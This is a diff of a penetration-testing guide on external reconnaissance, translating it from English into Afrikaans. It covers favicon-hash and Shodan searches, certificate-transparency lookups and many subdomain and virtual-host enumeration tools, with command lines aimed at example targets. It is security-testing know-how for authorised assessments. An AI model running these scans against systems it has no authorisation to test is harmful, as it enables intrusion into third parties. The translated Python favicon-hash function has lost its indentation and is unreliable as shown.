icon hash? This is exactly what [favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py) tool made by [@m4ll0k2](https://twitter.com/m4ll0k2) does. Here’s how to use it: - +Het jy geweet dat ons verwante domeine en subdomeine aan ons teiken kan vind deur te soek na dieselfde favicon-ikoonhash? Dit is presies wat die [favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py) hulpmiddel, gemaak deur [@m4ll0k2](https://twitter.com/m4ll0k2), doen. Hier is hoe om dit te gebruik: ```bash cat my_targets.txt | xargs -I %% bash -c 'echo "http://%%/favicon.ico"' > targets.txt python3 favihash.py -f https://target/favicon.ico -t targets.txt -s ``` +![favihash - ontdek domeine met dieselfde favicon-ikoon-hash](https://www.infosecmatter.com/wp-content/uploads/2020/07/favihash.jpg) -![favihash - discover domains with the same favicon icon hash](https://www.infosecmatter.com/wp-content/uploads/2020/07/favihash.jpg) - -Simply said, favihash will allow us to discover domains that have the same favicon icon hash as our target. - -Moreover, you can also search technologies using the favicon hash as explained in [**this blog post**](https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139). That means that if you know the **hash of the favicon of a vulnerable version of a web tech** you can search if in shodan and **find more vulnerable places**: +Eenvoudig gestel, favihash sal ons in staat stel om domeine te ontdek wat dieselfde favicon-ikoon-hash as ons teiken het. +Verder kan jy ook tegnologieë soek deur die favicon-hash te gebruik soos verduidelik in [**hierdie blogpos**](https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139). Dit beteken dat as jy die **hash van die favicon van 'n kwesbare weergawe van 'n webtegnologie** ken, kan jy soek of dit in shodan is en **meer kwesbare plekke vind**: ```bash shodan search org:"Target" http.favicon.hash:116323821 --fields ip_str,port --separator " " | awk '{print $1":"$2}' ``` - -This is how you can **calculate the favicon hash** of a web: - +Dit is hoe jy die **favicon-hash kan bereken** van 'n webwerf: ```python import mmh3 import requests import codecs def fav_hash(url): - response = requests.get(url) - favicon = codecs.encode(response.content,"base64") - fhash = mmh3.hash(favicon) - print(f"{url} : {fhash}") - return fhash +response = requests.get(url) +favicon = codecs.encode(response.content,"base64") +fhash = mmh3.hash(favicon) +print(f"{url} : {fhash}") +return fhash ``` +### **Auteursreg / Unieke string** -### **Copyright / Uniq string** +Soek binne die webbladsye na **strings wat gedeel kan word oor verskillende webwerwe in dieselfde organisasie**. Die **auteursreg string** kan 'n goeie voorbeeld wees. Soek dan vir daardie string in **Google**, in ander **blaaierprogramme** of selfs in **Shodan**: `shodan search http.html:"Auteursreg string"` -Search inside the web pages **strings that could be shared across different webs in the same organisation**. The **copyright string** could be a good example. Then search for that string in **google**, in other **browsers** or even in **shodan**: `shodan search http.html:"Copyright string"` - -### **CRT Time** - -It's common to have a cron job such as +### **CRT-tyd** +Dit is algemeen om 'n cron-taak te hê soos ```bash # /etc/crontab 37 13 */10 * * certbot renew --post-hook "systemctl reload nginx" ``` +### **Passiewe Oorname** -to renew the all the domain certificates on the server. This means that even if the CA used for this doesn't set the time it was generated in the Validity time, it's possible to **find domains belonging to the same company in the certificate transparency logs**.\ -Check out this [**writeup for more information**](https://swarm.ptsecurity.com/discovering-domains-via-a-time-correlation-attack/). +Dit is blykbaar algemeen vir mense om subdomeine toe te ken aan IP-adresse wat aan wolkverskaffers behoort en op 'n stadium daardie IP-adres te verloor, maar vergeet om die DNS-rekord te verwyder. Daarom sal die skep van 'n VM in 'n wolk (soos Digital Ocean) jou eintlik die beheer oor sommige subdomeine gee. -### **Passive Takeover** +[**Hierdie berig**](https://kmsec.uk/blog/passive-takeover/) verduidelik 'n storie daaroor en stel 'n skripsie voor wat 'n VM in DigitalOcean skep, die IPv4 van die nuwe masjien kry, en in Virustotal soek na subdomeinrekords wat daarna verwys. -Apparently is common for people to assign subdomains to IPs that belongs to cloud providers and at some point **lose that IP address but forget about removing the DNS record**. Therefore, just **spawning a VM** in a cloud (like Digital Ocean) you will be actually **taking over some subdomains(s)**. +### **Ander maniere** -[**This post**](https://kmsec.uk/blog/passive-takeover/) explains a store about it and propose a script that **spawns a VM in DigitalOcean**, **gets** the **IPv4** of the new machine, and **searches in Virustotal for subdomain records** pointing to it. - -### **Other ways** - -**Note that you can use this technique to discover more domain names every time you find a new domain.** +**Let daarop dat jy hierdie tegniek kan gebruik om meer domeinname te ontdek elke keer as jy 'n nuwe domein vind.** **Shodan** -As you already know the name of the organisation owning the IP space. You can search by that data in shodan using: `org:"Tesla, Inc."` Check the found hosts for new unexpected domains in the TLS certificate. +Aangesien jy reeds die naam van die organisasie wat die IP-ruimte besit, ken, kan jy daarna soek in Shodan deur die volgende te gebruik: `org:"Tesla, Inc."` Kyk na die gevonde gasheer vir nuwe onverwagte domeine in die TLS-sertifikaat. -You could access the **TLS certificate** of the main web page, obtain the **Organisation name** and then search for that name inside the **TLS certificates** of all the web pages known by **shodan** with the filter : `ssl:"Tesla Motors"` or use a tool like [**sslsearch**](https://github.com/HarshVaragiya/sslsearch). +Jy kan toegang verkry tot die **TLS-sertifikaat** van die hoofwebblad, die **Organisasienaam** verkry en dan soek na daardie naam binne die **TLS-sertifikate** van al die webbladsye wat bekend is by **Shodan** met die filter: `ssl:"Tesla Motors"` of gebruik 'n hulpmiddel soos [**sslsearch**](https://github.com/HarshVaragiya/sslsearch). **Assetfinder** -[**Assetfinder** ](https://github.com/tomnomnom/assetfinder)is a tool that look for **domains related** with a main domain and **subdomains** of them, pretty amazing. +[**Assetfinder**](https://github.com/tomnomnom/assetfinder) is 'n hulpmiddel wat soek na **verwante domeine** van 'n hoofdomein en **subdomeine** daarvan, baie indrukwekkend. -### **Looking for vulnerabilities** +### **Soek na kwesbaarhede** -Check for some [domain takeover](../../pentesting-web/domain-subdomain-takeover.md#domain-takeover). Maybe some company is **using some a domain** but they **lost the ownership**. Just register it (if cheap enough) and let know the company. +Kyk vir 'n [domein-oorgawe](../../pentesting-web/domain-subdomain-takeover.md#domain-takeover). Dalk gebruik 'n maatskappy 'n domein, maar het hulle die eienaarskap verloor. Registreer dit net (as dit goedkoop genoeg is) en laat die maatskappy weet. -If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\ -_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._ +As jy enige **domein met 'n ander IP** as diegene wat jy reeds in die bate-ontdekking gevind het, vind, moet jy 'n **basiese kwesbaarheidsskandering** (met behulp van Nessus of OpenVAS) en 'n [**poortskenning**](../pentesting-network/#discovering-hosts-from-the-outside) met **nmap/masscan/shodan** uitvoer. Afhangende van watter dienste besig is, kan jy in **hierdie boek 'n paar truuks vind om hulle te "aanval"**.\ +Merk op dat die domein soms gehuisves word binne 'n IP wat nie deur die kliënt beheer word nie, so dit val buite die bestek, wees versigtig. \ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **Teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers vir hackers geskep is**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) en begin om belonings tot **$100,000** te verdien! {% embed url="https://go.intigriti.com/hacktricks" %} -## Subdomains +## Subdomeine -> We know all the companies inside the scope, all the assets of each company and all the domains related to the companies. +> Ons ken al die maatskappye binne die bestek, al die bates van elke maatskappy en al die domeine wat verband hou met die maatskappye. -It's time to find all the possible subdomains of each found domain. +Dit is tyd om al die moontlike subdomeine van elke gevonde domein te vind. ### **DNS** -Let's try to get **subdomains** from the **DNS** records. We should also try for **Zone Transfer** (If vulnerable, you should report it). - +Laten ons probeer om **subdomeine** uit die **DNS**-rekords te kry. Ons moet ook probeer vir **Zone Transfer** (As dit kwesbaar is, moet jy dit rapporteer). ```bash dnsrecon -a -d tesla.com ``` - ### **OSINT** -The fastest way to obtain a lot of subdomains is search in external sources. The most used **tools** are the following ones (for better results configure the API keys): +Die vinnigste manier om 'n groot aantal subdomeine te verkry, is om in eksterne bronne te soek. Die mees gebruikte **hulpmiddels** is die volgende (stel die API-sleutels vir beter resultate): * [**BBOT**](https://github.com/blacklanternsecurity/bbot) - ```bash # subdomains bbot -t tesla.com -f subdomain-enum @@ -246,108 +226,80 @@ bbot -t tesla.com -f subdomain-enum -rf passive # subdomains + port scan + web screenshots bbot -t tesla.com -f subdomain-enum -m naabu gowitness -n my_scan -o . ``` - * [**Amass**](https://github.com/OWASP/Amass) - ```bash amass enum [-active] [-ip] -d tesla.com amass enum -d tesla.com | grep tesla.com # To just list subdomains ``` - * [**subfinder**](https://github.com/projectdiscovery/subfinder) - ```bash # Subfinder, use -silent to only have subdomains in the output ./subfinder-linux-amd64 -d tesla.com [-silent] ``` - * [**findomain**](https://github.com/Edu4rdSHL/findomain/) - ```bash # findomain, use -silent to only have subdomains in the output ./findomain-linux -t tesla.com [--quiet] ``` - -* [**OneForAll**](https://github.com/shmilylty/OneForAll/tree/master/docs/en-us) - +* [**OneForAll**](https://github.com/shmilylty/OneForAll/tree/master/docs/af-za) ```bash python3 oneforall.py --target tesla.com [--dns False] [--req False] [--brute False] run ``` - * [**assetfinder**](https://github.com/tomnomnom/assetfinder) - ```bash assetfinder --subs-only ``` - * [**Sudomy**](https://github.com/Screetsec/Sudomy) - ```bash # It requires that you create a sudomy.api file with API keys sudomy -d tesla.com ``` - * [**vita**](https://github.com/junnlikestea/vita) - ``` vita -d tesla.com ``` - * [**theHarvester**](https://github.com/laramies/theHarvester) - ```bash theHarvester -d tesla.com -b "anubis, baidu, bing, binaryedge, bingapi, bufferoverun, censys, certspotter, crtsh, dnsdumpster, duckduckgo, fullhunt, github-code, google, hackertarget, hunter, intelx, linkedin, linkedin_links, n45ht, omnisint, otx, pentesttools, projectdiscovery, qwant, rapiddns, rocketreach, securityTrails, spyse, sublist3r, threatcrowd, threatminer, trello, twitter, urlscan, virustotal, yahoo, zoomeye" ``` +Daar is **ander interessante gereedskap/API's** wat, alhoewel nie direk gespesialiseer is in die vind van subdomeine nie, nuttig kan wees om subdomeine te vind, soos: -There are **other interesting tools/APIs** that even if not directly specialised in finding subdomains could be useful to find subdomains, like: - -* [**Crobat**](https://github.com/cgboal/sonarsearch)**:** Uses the API [https://sonar.omnisint.io](https://sonar.omnisint.io) to obtain subdomains - +* [**Crobat**](https://github.com/cgboal/sonarsearch)**:** Gebruik die API [https://sonar.omnisint.io](https://sonar.omnisint.io) om subdomeine te verkry. ```bash # Get list of subdomains in output from the API ## This is the API the crobat tool will use curl https://sonar.omnisint.io/subdomains/tesla.com | jq -r ".[]" ``` - -* [**JLDC free API**](https://jldc.me/anubis/subdomains/google.com) - +* [**JLDC gratis API**](https://jldc.me/anubis/subdomains/google.com) ```bash curl https://jldc.me/anubis/subdomains/tesla.com | jq -r ".[]" ``` - -* [**RapidDNS**](https://rapiddns.io) free API - +* [**RapidDNS**](https://rapiddns.io) gratis API ```bash # Get Domains from rapiddns free API rapiddns(){ - curl -s "https://rapiddns.io/subdomain/$1?full=1" \ - | grep -oE "[\.a-zA-Z0-9-]+\.$1" \ - | sort -u +curl -s "https://rapiddns.io/subdomain/$1?full=1" \ +| grep -oE "[\.a-zA-Z0-9-]+\.$1" \ +| sort -u } rapiddns tesla.com ``` - * [**https://crt.sh/**](https://crt.sh) - ```bash # Get Domains from crt free API crt(){ - curl -s "https://crt.sh/?q=%25.$1" \ - | grep -oE "[\.a-zA-Z0-9-]+\.$1" \ - | sort -u +curl -s "https://crt.sh/?q=%25.$1" \ +| grep -oE "[\.a-zA-Z0-9-]+\.$1" \ +| sort -u } crt tesla.com ``` - -* [**gau**](https://github.com/lc/gau)**:** fetches known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl for any given domain. - +* [**gau**](https://github.com/lc/gau)**:** haal bekende URL's op van AlienVault se Open Threat Exchange, die Wayback Machine, en Common Crawl vir enige gegewe domein. ```bash # Get subdomains from GAUs found URLs gau --subs tesla.com | cut -d "/" -f 3 | sort -u ``` - -* [**SubDomainizer**](https://github.com/nsonaniya2010/SubDomainizer) **&** [**subscraper**](https://github.com/Cillian-Collins/subscraper): They scrap the web looking for JS files and extract subdomains from there. - +* [**SubDomainizer**](https://github.com/nsonaniya2010/SubDomainizer) **&** [**subscraper**](https://github.com/Cillian-Collins/subscraper): Hulle skraap die web op soek na JS-lêers en onttrek subdomeine daaruit. ```bash # Get only subdomains from SubDomainizer python3 SubDomainizer.py -u https://tesla.com | grep tesla.com @@ -355,42 +307,35 @@ python3 SubDomainizer.py -u https://tesla.com | grep tesla.com # Get only subdomains from subscraper, this already perform recursion over the found results python subscraper.py -u tesla.com | grep tesla.com | cut -d " " -f ``` - * [**Shodan**](https://www.shodan.io/) - ```bash # Get info about the domain shodan domain # Get other pages with links to subdomains shodan search "http.html:help.domain.com" ``` - -* [**Censys subdomain finder**](https://github.com/christophetd/censys-subdomain-finder) - +* [**Censys subdomein vindprogram**](https://github.com/christophetd/censys-subdomain-finder) ```bash export CENSYS_API_ID=... export CENSYS_API_SECRET=... python3 censys-subdomain-finder.py tesla.com ``` - * [**DomainTrail.py**](https://github.com/gatete/DomainTrail) - ```bash python3 DomainTrail.py -d example.com ``` - -* [**securitytrails.com**](https://securitytrails.com/) has a free API to search for subdomains and IP history +* [**securitytrails.com**](https://securitytrails.com/) het 'n gratis API om na subdomeine en IP-geskiedenis te soek * [**chaos.projectdiscovery.io**](https://chaos.projectdiscovery.io/#/) -This project offers for **free all the subdomains related to bug-bounty programs**. You can access this data also using [chaospy](https://github.com/dr-0x0x/chaospy) or even access the scope used by this project [https://github.com/projectdiscovery/chaos-public-program-list](https://github.com/projectdiscovery/chaos-public-program-list) +Hierdie projek bied **gratis alle subdomeine wat verband hou met fout-vondsprogramme**. Jy kan ook toegang tot hierdie data verkry deur [chaospy](https://github.com/dr-0x0x/chaospy) te gebruik of selfs toegang te verkry tot die omvang wat deur hierdie projek gebruik word [https://github.com/projectdiscovery/chaos-public-program-list](https://github.com/projectdiscovery/chaos-public-program-list) -You can find a **comparison** of many of these tools here: [https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off](https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off) +Jy kan 'n **vergelyking** van baie van hierdie gereedskap hier vind: [https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off](https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off) ### **DNS Brute force** -Let's try to find new **subdomains** brute-forcing DNS servers using possible subdomain names. +Laat ons probeer om nuwe **subdomeine** te vind deur DNS-bedieners te dwing met behulp van moontlike subdomeinname. -For this action you will need some **common subdomains wordlists like**: +Vir hierdie aksie sal jy 'n paar **gewone subdomeinwoordlyste soos** nodig hê: * [https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056](https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056) * [https://wordlists-cdn.assetnote.io/data/manual/best-dns-wordlist.txt](https://wordlists-cdn.assetnote.io/data/manual/best-dns-wordlist.txt) @@ -398,118 +343,93 @@ For this action you will need some **common subdomains wordlists like**: * [https://github.com/pentester-io/commonspeak](https://github.com/pentester-io/commonspeak) * [https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS](https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS) -And also IPs of good DNS resolvers. In order to generate a list of trusted DNS resolvers you can download the resolvers from [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) and use [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) to filter them. Or you could use: [https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt](https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt) +En ook IP-adresse van goeie DNS-oplossers. Om 'n lys van vertroude DNS-oplossers te genereer, kan jy die oplossers aflaai vanaf [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) en [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) gebruik om hulle te filtreer. Of jy kan gebruik maak van: [https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt](https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt) -The most recommended tools for DNS brute-force are: - -* [**massdns**](https://github.com/blechschmidt/massdns): This was the first tool that performed an effective DNS brute-force. It's very fast however it's prone to false positives. +Die mees aanbevole gereedskap vir DNS-brute force is: +* [**massdns**](https://github.com/blechschmidt/massdns): Dit was die eerste gereedskap wat 'n doeltreffende DNS-brute force uitgevoer het. Dit is baie vinnig, maar dit is geneig om vals positiewe resultate te gee. ```bash sed 's/$/.domain.com/' subdomains.txt > bf-subdomains.txt ./massdns -r resolvers.txt -w /tmp/results.txt bf-subdomains.txt grep -E "tesla.com. [0-9]+ IN A .+" /tmp/results.txt ``` - -* [**gobuster**](https://github.com/OJ/gobuster): This one I think just uses 1 resolver - +* [**gobuster**](https://github.com/OJ/gobuster): Ek dink hierdie een gebruik net 1 oplosser ``` gobuster dns -d mysite.com -t 50 -w subdomains.txt ``` - -* [**shuffledns**](https://github.com/projectdiscovery/shuffledns) is a wrapper around `massdns`, written in go, that allows you to enumerate valid subdomains using active bruteforce, as well as resolve subdomains with wildcard handling and easy input-output support. - +* [**shuffledns**](https://github.com/projectdiscovery/shuffledns) is 'n omhulsel rondom `massdns`, geskryf in go, wat jou in staat stel om geldige subdomeine op te som deur middel van aktiewe bruteforce, asook om subdomeine op te los met wildcard hantering en maklike in-uitset ondersteuning. ``` shuffledns -d example.com -list example-subdomains.txt -r resolvers.txt ``` - -* [**puredns**](https://github.com/d3mondev/puredns): It also uses `massdns`. - +* [**puredns**](https://github.com/d3mondev/puredns): Dit maak ook gebruik van `massdns`. ``` puredns bruteforce all.txt domain.com ``` - -* [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) uses asyncio to brute force domain names asynchronously. - +* [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) gebruik asyncio om domeinname asinkronies te brute force. ``` aiodnsbrute -r resolvers -w wordlist.txt -vv -t 1024 domain.com ``` +### Tweede DNS Brute-Force Ronde -### Second DNS Brute-Force Round - -After having found subdomains using open sources and brute-forcing, you could generate alterations of the subdomains found to try to find even more. Several tools are useful for this purpose: - -* [**dnsgen**](https://github.com/ProjectAnte/dnsgen)**:** Given the domains and subdomains generate permutations. +Nadat jy subdomeine gevind het deur gebruik te maak van oop bronne en brute-force, kan jy variasies van die gevonde subdomeine genereer om te probeer om selfs meer te vind. Verskeie hulpmiddels is nuttig vir hierdie doel: +* [**dnsgen**](https://github.com/ProjectAnte/dnsgen)**:** Gee die domeine en subdomeine en genereer permutasies. ```bash cat subdomains.txt | dnsgen - ``` - -* [**goaltdns**](https://github.com/subfinder/goaltdns): Given the domains and subdomains generate permutations. - * You can get goaltdns permutations **wordlist** in [**here**](https://github.com/subfinder/goaltdns/blob/master/words.txt). - +* [**goaltdns**](https://github.com/subfinder/goaltdns): Gee die domeine en subdomeine en genereer permutasies. +* Jy kan die goaltdns permutasies **woordelys** hier kry [**hier**](https://github.com/subfinder/goaltdns/blob/master/words.txt). ```bash goaltdns -l subdomains.txt -w /tmp/words-permutations.txt -o /tmp/final-words-s3.txt ``` - -* [**gotator**](https://github.com/Josue87/gotator)**:** Given the domains and subdomains generate permutations. If not permutations file is indicated gotator will use its own one. - +* [**gotator**](https://github.com/Josue87/gotator)**:** Gee die domeine en subdomeine en genereer permutasies. As geen permutasie lêer aangedui word nie, sal gotator sy eie een gebruik. ``` gotator -sub subdomains.txt -silent [-perm /tmp/words-permutations.txt] ``` - -* [**altdns**](https://github.com/infosec-au/altdns): Apart from generating subdomains permutations, it can also try to resolve them (but it's better to use the previous commented tools). - * You can get altdns permutations **wordlist** in [**here**](https://github.com/infosec-au/altdns/blob/master/words.txt). - +* [**altdns**](https://github.com/infosec-au/altdns): Afgesien van die generering van subdomein-permutasies, kan dit ook probeer om hulle op te los (maar dit is beter om die vorige genoemde gereedskap te gebruik). +* Jy kan die altdns permutasies **woordelys** hier kry [**hier**](https://github.com/infosec-au/altdns/blob/master/words.txt). ``` altdns -i subdomains.txt -w /tmp/words-permutations.txt -o /tmp/asd3 ``` - -* [**dmut**](https://github.com/bp0lr/dmut): Another tool to perform permutations, mutations and alteration of subdomains. This tool will brute force the result (it doesn't support dns wild card). - * You can get dmut permutations wordlist in [**here**](https://raw.githubusercontent.com/bp0lr/dmut/main/words.txt). - +* [**dmut**](https://github.com/bp0lr/dmut): 'n Ander instrument om permutasies, mutasies en verandering van subdomeine uit te voer. Hierdie instrument sal die resultaat met geweld afdwing (dit ondersteun nie dns-wildkaart nie). +* Jy kan die dmut-permutasies-woordelys hier kry [**hier**](https://raw.githubusercontent.com/bp0lr/dmut/main/words.txt). ```bash cat subdomains.txt | dmut -d /tmp/words-permutations.txt -w 100 \ - --dns-errorLimit 10 --use-pb --verbose -s /tmp/resolvers-trusted.txt +--dns-errorLimit 10 --use-pb --verbose -s /tmp/resolvers-trusted.txt ``` +* [**alterx**](https://github.com/projectdiscovery/alterx)**:** Gebaseer op 'n domein, **genereer dit nuwe potensiële subdomeinname** gebaseer op aangeduide patrone om meer subdomeine te ontdek. -* [**alterx**](https://github.com/projectdiscovery/alterx)**:** Based on a domain it **generates new potential subdomains names** based on indicated patterns to try to discover more subdomains. - -#### Smart permutations generation - -* [**regulator**](https://github.com/cramppet/regulator): For more info read this [**post**](https://cramppet.github.io/regulator/index.html) but it will basically get the **main parts** from the **discovered subdomains** and will mix them to find more subdomains. +#### Slim permutasie generasie +* [**regulator**](https://github.com/cramppet/regulator): Vir meer inligting lees hierdie [**pos**](https://cramppet.github.io/regulator/index.html), maar dit sal basies die **hoofdele** van die **ontdekte subdomeine** kry en meng om meer subdomeine te vind. ```bash python3 main.py adobe.com adobe adobe.rules make_brute_list.sh adobe.rules adobe.brute puredns resolve adobe.brute --write adobe.valid ``` - -* [**subzuf**](https://github.com/elceef/subzuf)**:** _subzuf_ is a subdomain brute-force fuzzer coupled with an immensly simple but effective DNS reponse-guided algorithm. It utilizes a provided set of input data, like a tailored wordlist or historical DNS/TLS records, to accurately synthesize more corresponding domain names and expand them even further in a loop based on information gathered during DNS scan. - +* [**subzuf**](https://github.com/elceef/subzuf)**:** _subzuf_ is 'n subdomein brute-force fuzzer wat gekoppel is aan 'n eenvoudige maar effektiewe DNS-respons-geleide algoritme. Dit maak gebruik van 'n voorsiene stel insetdata, soos 'n op maat gemaakte woordelys of historiese DNS/TLS-rekords, om akkuraat meer ooreenstemmende domeinname te sintetiseer en hulle verder uit te brei in 'n lus gebaseer op inligting wat tydens die DNS-scan ingesamel is. ``` echo www | subzuf facebook.com ``` +### **Subdomein Ontdekkingswerkstroom** -### **Subdomain Discovery Workflow** - -Check this blog post I wrote about how to **automate the subdomain discovery** from a domain using **Trickest workflows** so I don't need to launch manually a bunch of tools in my computer: +Kyk na hierdie blogpos wat ek geskryf het oor hoe om die ontdekking van subdomeine outomaties te maak deur gebruik te maak van Trickest-werkstrome sodat ek nie handmatig 'n klomp gereedskap op my rekenaar hoef te begin nie: {% embed url="https://trickest.com/blog/full-subdomain-discovery-using-workflow/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} {% embed url="https://trickest.com/blog/full-subdomain-brute-force-discovery-using-workflow/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -### **VHosts / Virtual Hosts** +### **VHosts / Virtuele Gasheer** -If you found an IP address containing **one or several web pages** belonging to subdomains, you could try to **find other subdomains with webs in that IP** by looking in **OSINT sources** for domains in an IP or by **brute-forcing VHost domain names in that IP**. +As jy 'n IP-adres gevind het wat een of verskeie webbladsye bevat wat aan subdomeine behoort, kan jy probeer om ander subdomeine met webbladsye in daardie IP te vind deur in OSINT-bronne te kyk vir domeine in 'n IP of deur VHost-domeinname in daardie IP te brute force. #### OSINT -You can find some **VHosts in IPs using** [**HostHunter**](https://github.com/SpiderLabs/HostHunter) **or other APIs**. +Jy kan sommige VHosts in IP's vind deur gebruik te maak van [HostHunter](https://github.com/SpiderLabs/HostHunter) of ander API's. **Brute Force** -If you suspect that some subdomain can be hidden in a web server you could try to brute force it: - +As jy vermoed dat 'n subdomein dalk weggesteek is op 'n webbediener, kan jy probeer om dit deur brute force te vind: ```bash ffuf -c -w /path/to/wordlist -u http://victim.com -H "Host: FUZZ.victim.com" @@ -523,219 +443,211 @@ vhostbrute.py --url="example.com" --remoteip="10.1.1.15" --base="www.example.com #https://github.com/codingo/VHostScan VHostScan -t example.com ``` - {% hint style="info" %} -With this technique you may even be able to access internal/hidden endpoints. +Met hierdie tegniek kan jy selfs toegang kry tot interne/verborge eindpunte. {% endhint %} ### **CORS Brute Force** -Sometimes you will find pages that only return the header _**Access-Control-Allow-Origin**_ when a valid domain/subdomain is set in the _**Origin**_ header. In these scenarios, you can abuse this behaviour to **discover** new **subdomains**. - +Soms sal jy bladsye vind wat slegs die _**Access-Control-Allow-Origin**_ kop _teruggee wanneer 'n geldige domein/subdomein in die _**Origin**_ kop ingestel is. In hierdie scenario's kan jy hierdie gedrag misbruik om nuwe **subdomeine** te **ontdek**. ```bash ffuf -w subdomains-top1million-5000.txt -u http://10.10.10.208 -H 'Origin: http://FUZZ.crossfit.htb' -mr "Access-Control-Allow-Origin" -ignore-body ``` +### **Emmers Brute Force** -### **Buckets Brute Force** +Terwyl jy soek na **subdomeine**, hou 'n oog uit om te sien of dit na enige soort **emmer** verwys, en in daardie geval [**kontroleer die toestemmings**](../../network-services-pentesting/pentesting-web/buckets/)**.**\ +Verder, aangesien jy op hierdie punt al die domeine binne die omvang sal ken, probeer [**brute force moontlike emmernaam en kontroleer die toestemmings**](../../network-services-pentesting/pentesting-web/buckets/). -While looking for **subdomains** keep an eye to see if it is **pointing** to any type of **bucket**, and in that case [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/)**.**\ -Also, as at this point you will know all the domains inside the scope, try to [**brute force possible bucket names and check the permissions**](../../network-services-pentesting/pentesting-web/buckets/). +### **Monitorisering** -### **Monitorization** +Jy kan **monitor** of **nuwe subdomeine** van 'n domein geskep word deur die **Sertifikaat Transparancy** Logboeke te monitor [**sublert** ](https://github.com/yassineaboukir/sublert/blob/master/sublert.py)doen. -You can **monitor** if **new subdomains** of a domain are created by monitoring the **Certificate Transparency** Logs [**sublert** ](https://github.com/yassineaboukir/sublert/blob/master/sublert.py)does. +### **Op soek na kwesbaarhede** -### **Looking for vulnerabilities** +Kyk vir moontlike [**subdomein-oorgawes**](../../pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).\ +As die **subdomein** na 'n **S3-emmer** verwys, [**kontroleer die toestemmings**](../../network-services-pentesting/pentesting-web/buckets/). -Check for possible [**subdomain takeovers**](../../pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).\ -If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/). +As jy enige **subdomein met 'n ander IP** as diegene wat jy reeds in die batesontdekking gevind het, moet jy 'n **basiese kwesbaarheidsskandering** (met behulp van Nessus of OpenVAS) en 'n paar [**poortskenning**](../pentesting-network/#discovering-hosts-from-the-outside) doen met **nmap/masscan/shodan**. Afhangende van watter dienste loop, kan jy in **hierdie boek 'n paar truuks vind om hulle te "aanval"**.\ +Merk op dat die subdomein soms gehuisves word binne 'n IP wat nie deur die kliënt beheer word nie, so dit is nie binne die omvang nie, wees versigtig. -If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\ -_Note that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._ +## IP's -## IPs +In die aanvanklike stappe het jy dalk **sekere IP-reekse, domeine en subdomeine gevind**.\ +Dit is tyd om al die IP's van daardie reekse te **versamel** en vir die **domeine/subdomeine (DNS-navrae)**. -In the initial steps you might have **found some IP ranges, domains and subdomains**.\ -It’s time to **recollect all the IPs from those ranges** and for the **domains/subdomains (DNS queries).** - -Using services from the following **free apis** you can also find **previous IPs used by domains and subdomains**. These IPs might still be owned by the client (and might allow you to find [**CloudFlare bypasses**](../../network-services-pentesting/pentesting-web/uncovering-cloudflare.md)) +Deur dienste van die volgende **gratis API's** te gebruik, kan jy ook **vorige IP's wat deur domeine en subdomeine gebruik is**, vind. Hierdie IP's mag steeds deur die kliënt besit word (en mag jou in staat stel om [**CloudFlare-omseilings**](../../network-services-pentesting/pentesting-web/uncovering-cloudflare.md) te vind) * [**https://securitytrails.com/**](https://securitytrails.com/) -You can also check for domains pointing a specific IP address using the tool [**hakip2host**](https://github.com/hakluke/hakip2host) +Jy kan ook vir domeine wat na 'n spesifieke IP-adres verwys, kyk deur die hulpmiddel [**hakip2host**](https://github.com/hakluke/hakip2host) te gebruik. -### **Looking for vulnerabilities** +### **Op soek na kwesbaarhede** -**Port scan all the IPs that doesn’t belong to CDNs** (as you highly probably won’t find anything interested in there). In the running services discovered you might be **able to find vulnerabilities**. +**Poortsken al die IP's wat nie aan CDN's behoort nie** (aangesien jy waarskynlik niks interessants daar sal vind nie). In die ontdekte lopende dienste kan jy **kwesbaarhede vind**. -**Find a** [**guide**](../pentesting-network/) **about how to scan hosts.** 